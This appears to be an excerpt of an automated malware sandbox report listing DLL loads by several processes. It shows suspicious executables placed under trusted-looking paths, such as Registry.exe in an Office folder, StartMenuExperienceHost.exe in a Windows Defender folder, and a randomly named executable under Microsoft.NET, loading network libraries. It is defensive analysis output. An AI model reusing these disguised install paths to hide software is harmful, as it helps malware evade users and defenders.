            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: version.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wldp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: profapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: amsi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: userenv.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: winnsi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: textshaping.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: textinputframework.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coreuicomponents.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coremessaging.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ntmarta.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coremessaging.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rasman.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: iphlpapi.dll
